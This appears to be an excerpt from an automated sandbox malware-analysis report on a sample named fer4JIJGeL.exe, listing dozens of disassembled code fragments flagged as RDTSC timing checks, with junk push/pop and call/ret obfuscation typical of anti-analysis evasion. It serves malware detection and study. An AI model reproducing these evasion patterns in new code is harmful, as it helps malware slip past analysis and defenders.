                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4A871 second address: E4A8CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F9F112ED79Ch 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D31CCh], ecx 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 mov eax, esi 0x00000018 push ecx 0x00000019 add ch, FFFFFFD3h 0x0000001c pop esi 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F9F112ED798h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a add ebx, 5C3C6B39h 0x00000040 xchg eax, esi 0x00000041 push esi 0x00000042 push eax 0x00000043 push edx 0x00000044 jl 00007F9F112ED796h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4B8CF second address: E4B944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F9F10525BF6h 0x00000009 jnc 00007F9F10525BF6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F9F10525BF8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov bx, D6CAh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007F9F10525BF8h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+122D362Dh], eax 0x00000055 xchg eax, esi 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F9F10525BFFh 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4C934 second address: E4C93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4BAAE second address: E4BAB3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4CB49 second address: E4CB53 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9F112ED79Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E50F05 second address: E50F95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007F9F10525C1Eh 0x00000010 pushad 0x00000011 jmp 00007F9F10525BFDh 0x00000016 jmp 00007F9F10525C09h 0x0000001b popad 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F9F10525BF8h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 push esi 0x00000038 sbb edi, 17BBE45Bh 0x0000003e pop edi 0x0000003f push 00000000h 0x00000041 mov dword ptr [ebp+1247C8C1h], edx 0x00000047 push 00000000h 0x00000049 jmp 00007F9F10525BFDh 0x0000004e movsx edi, cx 0x00000051 xchg eax, esi 0x00000052 je 00007F9F10525C00h 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E52064 second address: E5206A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E540E2 second address: E5416C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9F10525BFFh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F9F10525BF8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 jmp 00007F9F10525C00h 0x0000002e push 00000000h 0x00000030 jo 00007F9F10525BFCh 0x00000036 or dword ptr [ebp+122D21AFh], edx 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 call 00007F9F10525BF8h 0x00000046 pop eax 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b add dword ptr [esp+04h], 00000018h 0x00000053 inc eax 0x00000054 push eax 0x00000055 ret 0x00000056 pop eax 0x00000057 ret 0x00000058 sub dword ptr [ebp+122D3001h], esi 0x0000005e push eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 jg 00007F9F10525BF6h 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E5509F second address: E550B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F9F112ED79Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E550B3 second address: E55133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F9F10525BF8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 and bx, A42Ah 0x00000029 jmp 00007F9F10525C02h 0x0000002e push 00000000h 0x00000030 jmp 00007F9F10525BFEh 0x00000035 push ebx 0x00000036 cmc 0x00000037 pop edi 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F9F10525BF8h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000015h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov edi, dword ptr [ebp+122D1C3Ah] 0x0000005a xchg eax, esi 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e push esi 0x0000005f pop esi 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E53265 second address: E53269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E55133 second address: E55148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E53269 second address: E53290 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9F112ED796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9F112ED7A9h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E55148 second address: E55155 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E53290 second address: E53295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E55155 second address: E55167 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9F10525BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F9F10525BFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E53295 second address: E53334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F112ED79Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F9F112ED798h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e jne 00007F9F112ED799h 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov dword ptr [ebp+122D1D3Dh], edi 0x00000041 mov eax, dword ptr [ebp+122D0C31h] 0x00000047 mov dword ptr [ebp+122D2936h], ecx 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ecx 0x00000052 call 00007F9F112ED798h 0x00000057 pop ecx 0x00000058 mov dword ptr [esp+04h], ecx 0x0000005c add dword ptr [esp+04h], 0000001Ch 0x00000064 inc ecx 0x00000065 push ecx 0x00000066 ret 0x00000067 pop ecx 0x00000068 ret 0x00000069 mov ebx, dword ptr [ebp+122D39CBh] 0x0000006f push eax 0x00000070 jc 00007F9F112ED7A2h 0x00000076 jl 00007F9F112ED79Ch 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E58174 second address: E58188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E58188 second address: E5819F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9F112ED798h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F9F112ED798h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E57302 second address: E5739B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9F10525BFBh 0x0000000d pop edx 0x0000000e nop 0x0000000f ja 00007F9F10525BFCh 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F9F10525BF8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d jnp 00007F9F10525BFCh 0x00000043 mov dword ptr [ebp+122D25CDh], ebx 0x00000049 mov eax, dword ptr [ebp+122D170Dh] 0x0000004f mov edi, dword ptr [ebp+122D390Bh] 0x00000055 push FFFFFFFFh 0x00000057 jmp 00007F9F10525BFBh 0x0000005c nop 0x0000005d jng 00007F9F10525C08h 0x00000063 jmp 00007F9F10525C02h 0x00000068 push eax 0x00000069 pushad 0x0000006a push ebx 0x0000006b jne 00007F9F10525BF6h 0x00000071 pop ebx 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E5819F second address: E581A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E581A5 second address: E581A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E5CF03 second address: E5CF09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6022B second address: E6022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6022F second address: E6023E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9F112ED796h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E5F9FE second address: E5FA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E5FA05 second address: E5FA0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E5FA0B second address: E5FA0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E5FA0F second address: E5FA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E63F67 second address: E63FBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9F10525BFAh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jng 00007F9F10525BF8h 0x00000014 jmp 00007F9F10525C03h 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f jmp 00007F9F10525C04h 0x00000024 push ecx 0x00000025 jnl 00007F9F10525BF6h 0x0000002b pop ecx 0x0000002c popad 0x0000002d mov eax, dword ptr [eax] 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 pop eax 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6A59A second address: E6A59E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6A59E second address: E6A5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F9F10525C0Bh 0x0000000c push ecx 0x0000000d jnp 00007F9F10525BFEh 0x00000013 jl 00007F9F10525BF6h 0x00000019 push eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6A76A second address: E6A77C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9F112ED79Eh 0x0000000a push esi 0x0000000b pop esi 0x0000000c ja 00007F9F112ED796h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6AA7C second address: E6AA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 ja 00007F9F10525BF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6AA8C second address: E6AA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6AA95 second address: E6AA9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6AA9B second address: E6AAB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6ADA2 second address: E6ADA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6F30C second address: E6F312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6F452 second address: E6F458 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6F458 second address: E6F45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6F5A4 second address: E6F5A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6F6DA second address: E6F741 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F9F112ED7C2h 0x0000000c jbe 00007F9F112ED798h 0x00000012 pushad 0x00000013 jne 00007F9F112ED796h 0x00000019 jmp 00007F9F112ED7A6h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 pushad 0x00000026 popad 0x00000027 pop ebx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6FA63 second address: E6FA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6FA67 second address: E6FA80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6FD4A second address: E6FD52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6FD52 second address: E6FD56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6FD56 second address: E6FD7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9F10525C09h 0x0000000d jbe 00007F9F10525BF6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6FEF5 second address: E6FEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6FEFD second address: E6FF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E70072 second address: E70076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E70076 second address: E7007F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E701DE second address: E701FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9F112ED7A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E701FB second address: E70213 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C04h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E70213 second address: E70232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F9F112ED798h 0x0000000f jnc 00007F9F112ED79Eh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E70232 second address: E70237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E037E4 second address: E037EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E037EA second address: E037F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jnp 00007F9F10525BF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E037F9 second address: E037FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7432C second address: E74330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E74330 second address: E7434A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9F112ED7A4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E776E5 second address: E77705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9F10525C07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E77705 second address: E7771A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 jng 00007F9F112ED79Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7771A second address: E7771E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7771E second address: E77724 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7B879 second address: E7B87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7B87F second address: E7B88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7B88E second address: E7B89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F9F10525BF6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7B89C second address: E7B8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7B8A3 second address: E7B8BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9F10525C05h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7B8BE second address: E7B8D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9F112ED79Fh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7B8D7 second address: E7B8DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3999C second address: E399A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
